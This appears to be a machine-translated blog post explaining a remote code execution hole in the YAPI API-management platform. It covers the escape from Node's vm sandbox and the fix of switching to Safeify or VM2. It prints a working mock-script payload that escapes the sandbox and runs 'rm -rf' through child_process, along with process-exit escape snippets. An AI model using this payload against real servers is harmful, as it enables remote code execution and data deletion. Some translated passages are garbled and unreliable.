Cry, 21K Star's YAPI has been hacked

The thing is this, because our project uses this YAPI project, we received an early warning notice from the security group a few days ago, saying that YAPI has been exposed a security vulnerability, and the newly registered users can execute any code in your server and delete anything, so I need to make urgent modifications!!

I thought that such a large open source project (21.7K) should not have such a serious security hole.

I believe that many friends have used this open source software as an interface management tool, but in case some friends do not know what this library is, I will briefly introduce it.

YApi (
https://github.com/YMFE/yapi) is
efficient,
Easy to use,
powerfulAPI management platform, designed to provide more elegant interface management services for development, products, testers. YAPI can help developers create, publish and maintain APIs easily. YAPI also provides excellent interactive experience for users. Developers only need to use interface data writing tools provided by the platform and simple click operation to realize interface management.

Not only does it support Docker deployment, but it also has many plugins available, such as automated test plugins, automatic code generation, and more.

Well, going forward, I then took the security group duplicate path to duplicate the YAPI vulnerability.

First I created a 1.js in my/ Users/qiufeng/my/yapi directory.

Then open a project in YAPI — click Settings — and configure the global mock script

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockjson = process.mainModule.require("child_process").execSync("rm -rf /Users/qiufeng/my/yapi/1.js").toString()

Next, access our global mock address

Finally, we found that our 1.js was gone

So I immediately searched for YAPI security vulnerabilities on Google, and found that the Internet had exploded, with a lot of victims. Even Dalian University of Technology issued a statement, requiring immediate rectification of relevant codes.

We are mined by mining mining, by the transplanted Trojan horse transplanted Trojan horse.

Then let’s look at how to fix this security hole. The website fixes this problem mainly by incorporating a PR.

The main code to fix this vulnerability is to replace the Node.js VM with Safeify

It uses the VM module. Here, we will give you some knowledge about VM. Let’s take a look at the Node.js official website.

The VM module allows you to compile and run code in a V8 virtual machine context (The
vmModule Enables Compiling and Running Code Within V8 Virtual Machine Contexts.). The VM module is not a security mechanism. Do not use it to run untrusted code.

The common understanding is that it executes JavaScript code dynamically (similar to eval and Function). Of course, the official website also clearly pointed out the security of the VM module.

What’s the difference between eval and Function? Of course there is. First of all, the biggest problem with eval is that it’s intrusive, because eval is intruding into my current code. The VM provides a more secure sandbox environment.

First, we can use the vm.Script method to build a Script object: new vm.Script(code[, options]). The API can be summarized as follows:

script.runInThisContext(opts)– Run the script in the current scope, that is, the script has access to the global variables of the current script, not the local scope.
script.runInContext(context, opts)– Run the script in the provided scope, which is onevm.createContextResults. inscript.runInContextIn, you can provide a custom controllable sandbox.
script.runInNewContext(sandbox, opts)– Run the script in the scope of a new sandbox. namelyrunInNewContextWill be called automatically for youvm.createContext.

Here is an example:

const vm = require('vm');
vm.runInThisContext(code, opts);
vm.runInNewContext(code, sandbox, opts);
vm.runInContext(code, context, opts);

The VM implements the sandbox nature through optional scopes, isolating internal and external influences at once.

So so far, it seems that the VM is safe, why this security breach happened?

The reason is because of the features of JS…

Let’s start with a piece of code

const vm = require('vm');
vm.runInNewContext('this.constructor.constructor("return process")().exit()');

This is a messy looking code, but don’t underestimate this code, this code can directly let your program exit.

And then we’re going to go step by step, and we’re going to expand out RunInNewContext.

const vm = require('vm');

const sandbox = {};
const script = new vm.Script('this.constructor.constructor("return process")().exit()');
const context = vm.createContext(sandbox);

script.runInContext(context);

As we can see, to create a VM environment, we first need to create a sandbox object, which is then the global Context in the VM execution script. The VM’s this points to the sandbox.

Because the above code can also be disassembled like this.

const vm = require('vm'); const sandbox = {}; const ObjectConstructor = sandbox.constructor; / / access Object constructor const FunctionConstructor = ObjectConstructor. The constructor; // get const foo = FunctionConstructor('return constructor '); // create a function that returns the global process variable const process = foo(); process.exit();

This refers to an Object whose constructor is an Object whose constructor is an Object whose constructor is an Object. The constructor of an Object is the constructor of a Function.

Since we want to solve this problem, we can use a safer VM2 or Safeify. Next time we’ll look at the source code of these two libraries and how they address the shortcomings of the VM.

A link to the

https://segmentfault.com/a/11…

https://github.com/YMFE/yapi/…

Go back and read some of my best articles from the past, maybe you can get more!

2021 Front-end Learning Path Booklist — The Path to Self-Growth:570 +Thumb up quantity
Discussing front-end watermarking from deciphering a design website (detailed tutorial):790 +Thumb up quantity
This article unlocks the secrets of “file download” layer by layer:140 +Thumb up quantity
10 cross-domain solutions (with the ultimate tip):940 +Thumb up quantity

conclusion

❤️ follow + thumb up + favorites + comments + forwarding, original is not easy, encourage the author to create better articles

Pay attention to the public number Qiufeng notes, a focus on the front-end interview, engineering, open source front-end public number

mo4tech.com (Moment For Technology) is a global community with thousands techies from across the global hang out!Passionate technologists, be it gadget freaks, tech enthusiasts, coders, technopreneurs, or CIOs, you would find them all here.

Cry, 21K Star’s YAPI has been hacked

conclusion

Cry, 21K Star’s YAPI has been hacked

conclusion

Related Posts

Several ways of inheritance

NextTick Principle Analysis

VS Code Keyboard Shortcuts